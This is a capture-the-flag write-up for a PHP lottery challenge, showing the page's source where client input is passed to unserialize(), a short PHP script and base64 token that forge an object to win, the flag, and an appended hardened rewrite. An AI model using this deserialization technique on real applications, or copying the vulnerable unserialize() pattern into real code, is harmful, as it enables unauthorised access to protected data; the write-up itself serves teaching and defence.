💉TSULOTT

Easy

Overview

At the start there are two input fields: one where you enter your code to win the jackpot, and one where you enter six numbers to get a code.

We could type anything here, but first we use the Take code field: the page hands back a base64 string, and submitting that string in the first field returns the result shown in the image below.

Analysis

After a while we look at what the current page source contains (Ctrl+U).

There is a hint there: GET /?is_debug=1. After requesting it we get the challenge's source code, as follows:

<body>
<style>
input[type=text] {
    width: 40%;
    padding: 12px 20px;
    margin: 8px 0;
    box-sizing: border-box;
    border: 2px solid red;
    background-color: #ebfff8;
    border-radius: 4px;
}

button[type=submit] {
    width: 10%;
    background-color: #F94848;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}

button[type=submit]:hover {
    background-color: #45a049;
}

body {
    background-image: url("money.jpg");
}
</style>

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
          <input type="text" name="input" /><p><p>
          <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code']))
{
  $temp = new Object;
  $temp->enter=$_GET['gen_code'];
  $code=base64_encode(serialize($temp)); 
  echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>'.$code.'</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 15 02 94 11 88 76)</font><p>
<form>
      <input type="text" name="gen_code" maxlength="17" /><p><p>
      <button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<!-- debug: GET is_debug=1 -->
<?php
if(isset($_GET['is_debug']) && $_GET['is_debug']==='1')
{
   show_source(__FILE__);
}
?>
</body>

We will focus on the following two PHP segments:

<?php
class Object 
{ 
  var $jackpot;
  var $enter; 
}
?>


<?php

include('secret.php');

if(isset($_GET['input']))  
{
  $obj = unserialize(base64_decode($_GET['input']));
  if($obj)
  {
    $obj->jackpot = rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99).' '.rand(10,99); 
    if($obj->enter === $obj->jackpot)
    {
      echo "<center><strong><font color='white'>CONGRATULATION! You Won JACKPOT PriZe !!! </font></strong></center>". "<br><center><strong><font color='white' size='20'>".$obj->jackpot."</font></strong></center>";
      echo "<br><center><strong><font color='green' size='25'>".$flag."</font></strong></center><br>";
      echo "<center><img src='http://www.relatably.com/m/img/cross-memes/5378589.jpg' /></center>";

    }
    else
    {
      echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>". "<br><center><strong><font color='white' size='25'>".$obj->jackpot."</font></strong></center><br>";
    }
  }
  else
  {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
  }
}
else
{
  echo "";
}
?>

The first PHP segment declares a class Object with two properties, jackpot and enter.

Next, note line 16 of that listing: when input is submitted it is base64-decoded and unserialized, and the result is assigned to $obj. If $obj is truthy, jackpot is set to six random numbers, each drawn from 10 to 99 and separated by spaces.

Finally, if the enter property is strictly equal to jackpot, we get the flag.

Further down there is another segment that serializes whatever we enter in the lower form.

In short, we now recognize this as PHP deserialization: we can control the whole Object instance above by overriding it so that the two properties jackpot and enter are equal.

Exploit

The idea now is to rebuild the Object class as above and give it a __construct that sets the two properties equal.

<?php
// Rebuild of the challenge's class: the same two properties, with no value assigned to either.
class Exploit
{
    var $jackpot;
    var $enter;

    // Both properties are still null at this point, so after construction they are equal.
    public function __construct()
    {
        $this->jackpot=$this->enter;
    }

}
$code = new Exploit();
// Serialize and base64-encode to obtain the token the lottery form expects.
echo base64_encode(serialize($code));
//Tzo3OiJFeHBsb2l0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9
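As an added example, not the challenge's code and not the write-up author's, here is how the lottery handler could be rewritten so that the client token never reaches unserialize(): the token becomes base64-encoded JSON carrying one validated string, the draw stays entirely server-side, and the object is only ever built by the server's own code. The class name LottTicket and all function names are assumptions (the original name Object is avoided because PHP 7.2 and later reserve it), and the flag value is a placeholder.

```php
<?php
// Added example, not the challenge's code: a hardened lottery handler in which
// the client token is base64(JSON) and is never passed to unserialize().
// LottTicket and all function names are hypothetical; the challenge's class name
// Object is avoided because PHP 7.2 and later reserve it.

final class LottTicket
{
    public $jackpot = null;   // drawn by the server, never taken from the client
    public $enter   = null;   // the six numbers the player picked
}

// Exactly six two-digit numbers separated by single spaces, as the form promises.
const TICKET_PATTERN = '/^\d{2}( \d{2}){5}$/';

// Builds the token handed to the player. Only a validated string is encoded,
// so the token carries no class name and no server-side property.
function generateToken(string $numbers): ?string
{
    if (preg_match(TICKET_PATTERN, $numbers) !== 1) {
        return null;
    }
    return base64_encode(json_encode(['enter' => $numbers]));
}

// Parses the token back. Anything that is not strict base64, not JSON, not an
// object with a string "enter" field, or not in the expected shape is rejected
// before any object is created.
function parseTicket(string $token): ?LottTicket
{
    $raw = base64_decode($token, true);
    if ($raw === false) {
        return null;
    }
    $data = json_decode($raw, true);
    if (!is_array($data) || !isset($data['enter']) || !is_string($data['enter'])) {
        return null;
    }
    if (preg_match(TICKET_PATTERN, $data['enter']) !== 1) {
        return null;
    }
    $ticket = new LottTicket();
    $ticket->enter = $data['enter'];
    return $ticket;
}

// The draw happens server-side with a CSPRNG instead of rand().
function drawJackpot(): string
{
    $parts = [];
    for ($i = 0; $i < 6; $i++) {
        $parts[] = (string) random_int(10, 99);
    }
    return implode(' ', $parts);
}

function checkTicket(string $token, string $flag): string
{
    $ticket = parseTicket($token);
    if ($ticket === null) {
        return 'Something wrong, do not hack us please!';
    }
    $ticket->jackpot = drawJackpot();
    // Both sides are validated, server-controlled strings at this point.
    if (hash_equals($ticket->jackpot, $ticket->enter)) {
        return 'CONGRATULATION! You Won JACKPOT PriZe !!! ' . $flag;
    }
    return 'Wrong! True Six Numbers Are: ' . $ticket->jackpot;
}

// Demonstration with constructed inputs (the flag value is a placeholder).
$flag = 'FLAG{placeholder}';

// The serialized-object token from this write-up is valid base64 but not JSON,
// so it is rejected before any object exists.
$legacyToken = 'Tzo3OiJFeHBsb2l0IjoyOntzOjc6ImphY2twb3QiO047czo1OiJlbnRlciI7Tjt9';
echo checkTicket($legacyToken, $flag), PHP_EOL;

// A well-formed ticket is accepted and compared against the server's own draw.
echo checkTicket(generateToken('15 02 94 11 88 76'), $flag), PHP_EOL;
```

Run it with `php lott_fixed.php`. One caveat worth knowing when fixing code like the original handler: merely passing `['allowed_classes' => false]` to unserialize() would not have been enough. Every object then arrives as __PHP_Incomplete_Class, on which property writes are discarded with only a notice and property reads return null, so the server's rand() assignment to jackpot is lost and the strict comparison of two nulls still succeeds. The same PHP behaviour applies to the write-up's payload, whose class name Exploit is not defined on the server. Checking `$obj instanceof Object` right after unserialize() would close that path, but parsing a JSON field and validating its shape, as above, removes the deserialization surface altogether.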

Flag: MeePwnCTF{__OMG!!!__Y0u_Are_Milli0naire_N0ww!!___}
